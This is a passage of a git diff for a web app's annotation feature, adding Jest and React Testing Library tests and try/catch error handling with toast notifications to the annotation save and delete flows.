Assert + expect(mockSave).toHaveBeenCalledWith('Test save content') + }) + + it('should show delete option and restore original content when delete is clicked', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and change content + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to trigger content change + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenNthCalledWith(1, 'Modified content') + expect(await screen.findByText('common.operation.delete')).toBeInTheDocument() + + await user.click(screen.getByText('common.operation.delete')) + + expect(mockSave).toHaveBeenNthCalledWith(2, 'Test content') + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + + it('should handle keyboard interactions in edit mode', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + + // Test typing + await user.type(textarea, 'Keyboard test') + + // Assert + expect(textarea).toHaveValue('Keyboard test') + expect(screen.getByText(/keyboard test/i)).toBeInTheDocument() + }) + }) + + // State Management + describe('State Management', () => { + it('should reset newContent when content prop changes', async () => { + // Arrange + const { rerender } = render() + + // Act - Enter edit mode and type something + const user = userEvent.setup() + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await 
user.type(textarea, 'New content') + + // Rerender with new content prop + rerender() + + // Assert - Textarea value should be reset due to useEffect + expect(textarea).toHaveValue('') + }) + + it('should preserve edit state across content changes', async () => { + // Arrange + const { rerender } = render() + const user = userEvent.setup() + + // Act - Enter edit mode + await user.click(screen.getByText('common.operation.edit')) + + // Rerender with new content + rerender() + + // Assert - Should still be in edit mode + expect(screen.getByRole('textbox')).toBeInTheDocument() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty content', () => { + // Arrange + const props = { + ...defaultProps, + content: '', + } + + // Act + const { container } = render() + + // Assert - Should render without crashing + // Check that the component renders properly with empty content + expect(container.querySelector('.grow')).toBeInTheDocument() + // Should still show edit button + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longContent = 'A'.repeat(1000) + const props = { + ...defaultProps, + content: longContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(longContent)).toBeInTheDocument() + }) + + it('should handle content with special characters', () => { + // Arrange + const specialContent = 'Content with & < > " \' characters' + const props = { + ...defaultProps, + content: specialContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialContent)).toBeInTheDocument() + }) + + it('should handle rapid edit/cancel operations', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + // Rapid edit/cancel operations + await user.click(screen.getByText('common.operation.edit')) + await 
user.click(screen.getByText('common.operation.cancel')) + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText('Test content')).toBeInTheDocument() + }) + + it('should handle save failure gracefully in edit mode', async () => { + // Arrange + const mockSave = jest.fn().mockRejectedValueOnce(new Error('Save failed')) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and save (should fail) + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Save should fail but not throw + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert - Should remain in edit mode when save fails + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(mockSave).toHaveBeenCalledWith('New content') + }) + + it('should handle delete action failure gracefully', async () => { + // Arrange + const mockSave = jest.fn() + .mockResolvedValueOnce(undefined) // First save succeeds + .mockRejectedValueOnce(new Error('Delete failed')) // Delete fails + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Edit content to show delete button + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to create new content + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + await screen.findByText('common.operation.delete') + + // Click delete (should fail but not throw) + 
await user.click(screen.getByText('common.operation.delete')) + + // Assert - Delete action should handle error gracefully + expect(mockSave).toHaveBeenCalledTimes(2) + expect(mockSave).toHaveBeenNthCalledWith(1, 'Modified content') + expect(mockSave).toHaveBeenNthCalledWith(2, 'Test content') + + // When delete fails, the delete button should still be visible (state not changed) + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + expect(screen.getByText('Modified content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx index e808d0b48a..6ba830967d 100644 --- a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx @@ -6,7 +6,7 @@ import { RiDeleteBinLine, RiEditFill, RiEditLine } from '@remixicon/react' import { Robot, User } from '@/app/components/base/icons/src/public/avatar' import Textarea from '@/app/components/base/textarea' import Button from '@/app/components/base/button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export enum EditItemType { Query = 'query', @@ -52,8 +52,14 @@ const EditItem: FC = ({ }, [content]) const handleSave = async () => { - await onSave(newContent) - setIsEdit(false) + try { + await onSave(newContent) + setIsEdit(false) + } + catch { + // Keep edit mode open when save fails + // Error notification is handled by the parent component + } } const handleCancel = () => { @@ -96,9 +102,16 @@ const EditItem: FC = ({
·
{ - setNewContent(content) - onSave(content) + onClick={async () => { + try { + await onSave(content) + // Only update UI state after successful delete + setNewContent(content) + } + catch { + // Delete action failed - error is already handled by parent + // UI state remains unchanged, user can retry + } }} >
diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..bdc991116c --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx @@ -0,0 +1,680 @@ +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Toast, { type IToastProps, type ToastHandle } from '@/app/components/base/toast' +import EditAnnotationModal from './index' + +// Mock only external dependencies +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + editAnnotation: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 5 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }), +})) + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: () => '2023-12-01 10:30:00', + }), +})) + +// Note: i18n is automatically mocked by Jest via __mocks__/react-i18next.ts + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type ToastNotifyProps = Pick +type ToastWithNotify = typeof Toast & { notify: (props: ToastNotifyProps) => ToastHandle } +const toastWithNotify = Toast as unknown as ToastWithNotify +const toastNotifySpy = jest.spyOn(toastWithNotify, 'notify').mockReturnValue({ clear: jest.fn() }) + +const { addAnnotation: mockAddAnnotation, editAnnotation: mockEditAnnotation } = jest.requireMock('@/service/annotation') as { + addAnnotation: jest.Mock + editAnnotation: jest.Mock +} + +describe('EditAnnotationModal', () => { + const defaultProps = { + isShow: true, + onHide: jest.fn(), + appId: 'test-app-id', + query: 'Test query', + answer: 'Test answer', + onEdited: jest.fn(), + onAdded: jest.fn(), + onRemove: jest.fn(), + } + + afterAll(() => { + toastNotifySpy.mockRestore() + }) + + beforeEach(() => { + jest.clearAllMocks() + mockAddAnnotation.mockResolvedValue({ + id: 'test-id', + account: { name: 'Test User' }, + }) + mockEditAnnotation.mockResolvedValue({}) + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render modal when isShow is true', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Check for modal title as it appears in the mock + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should not render modal when isShow is false', () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + expect(screen.queryByText('appAnnotation.editModal.title')).not.toBeInTheDocument() + }) + + it('should display query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Look for query and answer content + expect(screen.getByText('Test query')).toBeInTheDocument() + expect(screen.getByText('Test answer')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should handle different query and answer content', 
() => { + // Arrange + const props = { + ...defaultProps, + query: 'Custom query content', + answer: 'Custom answer content', + } + + // Act + render() + + // Assert - Check content is displayed + expect(screen.getByText('Custom query content')).toBeInTheDocument() + expect(screen.getByText('Custom answer content')).toBeInTheDocument() + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Remove option should be present (using pattern) + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should enable editing for query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Edit links should be visible (using text content) + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(2) + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + + it('should save content when edited', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await 
user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'New query content', + answer: 'Test answer', + message_id: undefined, + }) + }) + }) + + // API Calls + describe('API Calls', () => { + it('should call addAnnotation when saving new annotation', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock the API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'Updated query', + answer: 'Test answer', + message_id: undefined, + }) + }) + + it('should call editAnnotation when updating existing annotation', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await 
user.click(saveButton) + + // Assert + expect(mockEditAnnotation).toHaveBeenCalledWith( + 'test-app-id', + 'test-annotation-id', + { + message_id: 'test-message-id', + question: 'Modified query', + answer: 'Test answer', + }, + ) + }) + }) + + // State Management + describe('State Management', () => { + it('should initialize with closed confirm modal', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Confirm dialog should not be visible initially + expect(screen.queryByText('appDebug.feature.annotation.removeConfirm')).not.toBeInTheDocument() + }) + + it('should show confirm modal when remove is clicked', async () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Assert - Confirmation dialog should appear + expect(screen.getByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + }) + + it('should call onRemove when removal is confirmed', async () => { + // Arrange + const mockOnRemove = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + onRemove: mockOnRemove, + } + const user = userEvent.setup() + + // Act + render() + + // Click remove + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Click confirm + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + // Assert + expect(mockOnRemove).toHaveBeenCalled() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty query and answer', () => { + // Arrange + const props = { + ...defaultProps, + query: '', + answer: '', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should handle very long content', () => 
{ + // Arrange + const longQuery = 'Q'.repeat(1000) + const longAnswer = 'A'.repeat(1000) + const props = { + ...defaultProps, + query: longQuery, + answer: longAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(longQuery)).toBeInTheDocument() + expect(screen.getByText(longAnswer)).toBeInTheDocument() + }) + + it('should handle special characters in content', () => { + // Arrange + const specialQuery = 'Query with & < > " \' characters' + const specialAnswer = 'Answer with & < > " \' characters' + const props = { + ...defaultProps, + query: specialQuery, + answer: specialAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialQuery)).toBeInTheDocument() + expect(screen.getByText(specialAnswer)).toBeInTheDocument() + }) + + it('should handle onlyEditResponse prop', () => { + // Arrange + const props = { + ...defaultProps, + onlyEditResponse: true, + } + + // Act + render() + + // Assert - Query should be readonly, answer should be editable + const editLinks = screen.queryAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(1) // Only answer should have edit button + }) + }) + + // Error Handling (CRITICAL for coverage) + describe('Error Handling', () => { + it('should show error toast and skip callbacks when addAnnotation fails', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock API failure + mockAddAnnotation.mockRejectedValueOnce(new Error('API Error')) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' 
}) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'API Error', + type: 'error', + }) + }) + expect(mockOnAdded).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show fallback error message when addAnnotation error has no message', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + mockAddAnnotation.mockRejectedValueOnce({}) + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionFailed', + type: 'error', + }) + }) + expect(mockOnAdded).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show error toast and skip callbacks when editAnnotation fails', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Mock API failure + mockEditAnnotation.mockRejectedValueOnce(new Error('API Error')) + + // Act + render() + + // Edit query content + const editLinks = 
screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'API Error', + type: 'error', + }) + }) + expect(mockOnEdited).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show fallback error message when editAnnotation error is not an Error instance', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + mockEditAnnotation.mockRejectedValueOnce('oops') + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionFailed', + type: 'error', + }) + }) + expect(mockOnEdited).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + }) + + // Billing & Plan Features + describe('Billing & Plan Features', () => { + it('should show 
createdAt time when provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + createdAt: 1701381000, // 2023-12-01 10:30:00 + } + + // Act + render() + + // Assert - Check that the formatted time appears somewhere in the component + const container = screen.getByRole('dialog') + expect(container).toHaveTextContent('2023-12-01 10:30:00') + }) + + it('should not show createdAt when not provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + // createdAt is undefined + } + + // Act + render() + + // Assert - Should not contain any timestamp + const container = screen.getByRole('dialog') + expect(container).not.toHaveTextContent('2023-12-01 10:30:00') + }) + + it('should display remove section when annotationId exists', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Should have remove functionality + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // Toast Notifications (Success) + describe('Toast Notifications', () => { + it('should show success notification when save operation completes', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionSuccess', + type: 'success', + }) + }) + }) + }) + + // React.memo Performance Testing + describe('React.memo Performance', () => { + it('should not re-render when props are 
the same', () => { + // Arrange + const props = { ...defaultProps } + const { rerender } = render() + + // Act - Re-render with same props + rerender() + + // Assert - Component should still be visible (no errors thrown) + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should re-render when props change', () => { + // Arrange + const props = { ...defaultProps } + const { rerender } = render() + + // Act - Re-render with different props + const newProps = { ...props, query: 'New query content' } + rerender() + + // Assert - Should show new content + expect(screen.getByText('New query content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.tsx index 2961ce393c..6172a215e4 100644 --- a/web/app/components/app/annotation/edit-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/edit-annotation-modal/index.tsx @@ -53,27 +53,39 @@ const EditAnnotationModal: FC = ({ postQuery = editedContent else postAnswer = editedContent - if (!isAdd) { - await editAnnotation(appId, annotationId, { - message_id: messageId, - question: postQuery, - answer: postAnswer, - }) - onEdited(postQuery, postAnswer) - } - else { - const res: any = await addAnnotation(appId, { - question: postQuery, - answer: postAnswer, - message_id: messageId, - }) - onAdded(res.id, res.account?.name, postQuery, postAnswer) - } + try { + if (!isAdd) { + await editAnnotation(appId, annotationId, { + message_id: messageId, + question: postQuery, + answer: postAnswer, + }) + onEdited(postQuery, postAnswer) + } + else { + const res = await addAnnotation(appId, { + question: postQuery, + answer: postAnswer, + message_id: messageId, + }) + onAdded(res.id, res.account?.name ?? 
'', postQuery, postAnswer) + } - Toast.notify({ - message: t('common.api.actionSuccess') as string, - type: 'success', - }) + Toast.notify({ + message: t('common.api.actionSuccess') as string, + type: 'success', + }) + } + catch (error) { + const fallbackMessage = t('common.api.actionFailed') as string + const message = error instanceof Error && error.message ? error.message : fallbackMessage + Toast.notify({ + message, + type: 'error', + }) + // Re-throw to preserve edit mode behavior for UI components + throw error + } } const [showModal, setShowModal] = useState(false) diff --git a/web/app/components/app/annotation/empty-element.spec.tsx b/web/app/components/app/annotation/empty-element.spec.tsx new file mode 100644 index 0000000000..56ebb96121 --- /dev/null +++ b/web/app/components/app/annotation/empty-element.spec.tsx @@ -0,0 +1,13 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import EmptyElement from './empty-element' + +describe('EmptyElement', () => { + it('should render the empty state copy and supporting icon', () => { + const { container } = render() + + expect(screen.getByText('appAnnotation.noData.title')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.noData.description')).toBeInTheDocument() + expect(container.querySelector('svg')).not.toBeNull() + }) +}) diff --git a/web/app/components/app/annotation/filter.spec.tsx b/web/app/components/app/annotation/filter.spec.tsx new file mode 100644 index 0000000000..6260ff7668 --- /dev/null +++ b/web/app/components/app/annotation/filter.spec.tsx @@ -0,0 +1,70 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import Filter, { type QueryParam } from './filter' +import useSWR from 'swr' + +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +jest.mock('@/service/log', () => ({ + fetchAnnotationsCount: jest.fn(), +})) + +const mockUseSWR = useSWR as unknown as jest.Mock + 
+describe('Filter', () => { + const appId = 'app-1' + const childContent = 'child-content' + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should render nothing until annotation count is fetched', () => { + mockUseSWR.mockReturnValue({ data: undefined }) + + const { container } = render( + +
{childContent}
+
, + ) + + expect(container.firstChild).toBeNull() + expect(mockUseSWR).toHaveBeenCalledWith( + { url: `/apps/${appId}/annotations/count` }, + expect.any(Function), + ) + }) + + it('should propagate keyword changes and clearing behavior', () => { + mockUseSWR.mockReturnValue({ data: { total: 20 } }) + const queryParams: QueryParam = { keyword: 'prefill' } + const setQueryParams = jest.fn() + + const { container } = render( + +
{childContent}
+
, + ) + + const input = screen.getByPlaceholderText('common.operation.search') as HTMLInputElement + fireEvent.change(input, { target: { value: 'updated' } }) + expect(setQueryParams).toHaveBeenCalledWith({ ...queryParams, keyword: 'updated' }) + + const clearButton = input.parentElement?.querySelector('div.cursor-pointer') as HTMLElement + fireEvent.click(clearButton) + expect(setQueryParams).toHaveBeenCalledWith({ ...queryParams, keyword: '' }) + + expect(container).toHaveTextContent(childContent) + }) +}) diff --git a/web/app/components/app/annotation/header-opts/index.spec.tsx b/web/app/components/app/annotation/header-opts/index.spec.tsx new file mode 100644 index 0000000000..3d8a1fd4ef --- /dev/null +++ b/web/app/components/app/annotation/header-opts/index.spec.tsx @@ -0,0 +1,439 @@ +import * as React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import type { ComponentProps } from 'react' +import HeaderOptions from './index' +import I18NContext from '@/context/i18n' +import { LanguagesSupported } from '@/i18n-config/language' +import type { AnnotationItemBasic } from '../type' +import { clearAllAnnotations, fetchExportAnnotationList } from '@/service/annotation' + +jest.mock('@headlessui/react', () => { + type PopoverContextValue = { open: boolean; setOpen: (open: boolean) => void } + type MenuContextValue = { open: boolean; setOpen: (open: boolean) => void } + const PopoverContext = React.createContext(null) + const MenuContext = React.createContext(null) + + const Popover = ({ children }: { children: React.ReactNode | ((props: { open: boolean }) => React.ReactNode) }) => { + const [open, setOpen] = React.useState(false) + const value = React.useMemo(() => ({ open, setOpen }), [open]) + return ( + + {typeof children === 'function' ? 
children({ open }) : children} + + ) + } + + const PopoverButton = React.forwardRef(({ onClick, children, ...props }: { onClick?: () => void; children?: React.ReactNode }, ref: React.Ref) => { + const context = React.useContext(PopoverContext) + const handleClick = () => { + context?.setOpen(!context.open) + onClick?.() + } + return ( + + ) + }) + + const PopoverPanel = React.forwardRef(({ children, ...props }: { children: React.ReactNode | ((props: { close: () => void }) => React.ReactNode) }, ref: React.Ref) => { + const context = React.useContext(PopoverContext) + if (!context?.open) return null + const content = typeof children === 'function' ? children({ close: () => context.setOpen(false) }) : children + return ( +
+ {content} +
+ ) + }) + + const Menu = ({ children }: { children: React.ReactNode }) => { + const [open, setOpen] = React.useState(false) + const value = React.useMemo(() => ({ open, setOpen }), [open]) + return ( + + {children} + + ) + } + + const MenuButton = ({ onClick, children, ...props }: { onClick?: () => void; children?: React.ReactNode }) => { + const context = React.useContext(MenuContext) + const handleClick = () => { + context?.setOpen(!context.open) + onClick?.() + } + return ( + + ) + } + + const MenuItems = ({ children, ...props }: { children: React.ReactNode }) => { + const context = React.useContext(MenuContext) + if (!context?.open) return null + return ( +
+ {children} +
+ ) + } + + return { + Dialog: ({ open, children, className }: { open?: boolean; children: React.ReactNode; className?: string }) => { + if (open === false) return null + return ( +
+ {children} +
+ ) + }, + DialogBackdrop: ({ children, className, onClick }: { children?: React.ReactNode; className?: string; onClick?: () => void }) => ( +
+ {children} +
+ ), + DialogPanel: ({ children, className, ...props }: { children: React.ReactNode; className?: string }) => ( +
+ {children} +
+ ), + DialogTitle: ({ children, className, ...props }: { children: React.ReactNode; className?: string }) => ( +
+ {children} +
+ ), + Popover, + PopoverButton, + PopoverPanel, + Menu, + MenuButton, + MenuItems, + Transition: ({ show = true, children }: { show?: boolean; children: React.ReactNode }) => (show ? <>{children} : null), + TransitionChild: ({ children }: { children: React.ReactNode }) => <>{children}, + } +}) + +let lastCSVDownloaderProps: Record | undefined +const mockCSVDownloader = jest.fn(({ children, ...props }) => { + lastCSVDownloaderProps = props + return ( +
+ {children} +
+ ) +}) + +jest.mock('react-papaparse', () => ({ + useCSVDownloader: () => ({ + CSVDownloader: (props: any) => mockCSVDownloader(props), + Type: { Link: 'link' }, + }), +})) + +jest.mock('@/service/annotation', () => ({ + fetchExportAnnotationList: jest.fn(), + clearAllAnnotations: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }), +})) + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type HeaderOptionsProps = ComponentProps + +const renderComponent = ( + props: Partial = {}, + locale: string = LanguagesSupported[0] as string, +) => { + const defaultProps: HeaderOptionsProps = { + appId: 'test-app-id', + onAdd: jest.fn(), + onAdded: jest.fn(), + controlUpdateList: 0, + ...props, + } + + return render( + + + , + ) +} + +const openOperationsPopover = async (user: ReturnType) => { + const trigger = document.querySelector('button.btn.btn-secondary') as HTMLButtonElement + expect(trigger).toBeTruthy() + await user.click(trigger) +} + +const expandExportMenu = async (user: ReturnType) => { + await openOperationsPopover(user) + const exportLabel = await screen.findByText('appAnnotation.table.header.bulkExport') + const exportButton = exportLabel.closest('button') as HTMLButtonElement + expect(exportButton).toBeTruthy() + await user.click(exportButton) +} + +const getExportButtons = async () => { + const csvLabel = await screen.findByText('CSV') + const jsonLabel = await screen.findByText('JSONL') + const csvButton = csvLabel.closest('button') as HTMLButtonElement + const jsonButton = jsonLabel.closest('button') as HTMLButtonElement + expect(csvButton).toBeTruthy() + expect(jsonButton).toBeTruthy() + return { + csvButton, + jsonButton, + } +} + +const clickOperationAction = async ( + user: ReturnType, + translationKey: string, +) => { + const label = await screen.findByText(translationKey) + const button = label.closest('button') as HTMLButtonElement + expect(button).toBeTruthy() + await user.click(button) +} + +const mockAnnotations: AnnotationItemBasic[] = [ + { + question: 'Question 1', + answer: 'Answer 1', + }, +] + +const mockedFetchAnnotations = jest.mocked(fetchExportAnnotationList) +const mockedClearAllAnnotations = jest.mocked(clearAllAnnotations) + +describe('HeaderOptions', () => { + beforeEach(() => { + jest.clearAllMocks() + jest.useRealTimers() + mockCSVDownloader.mockClear() + lastCSVDownloaderProps = undefined + 
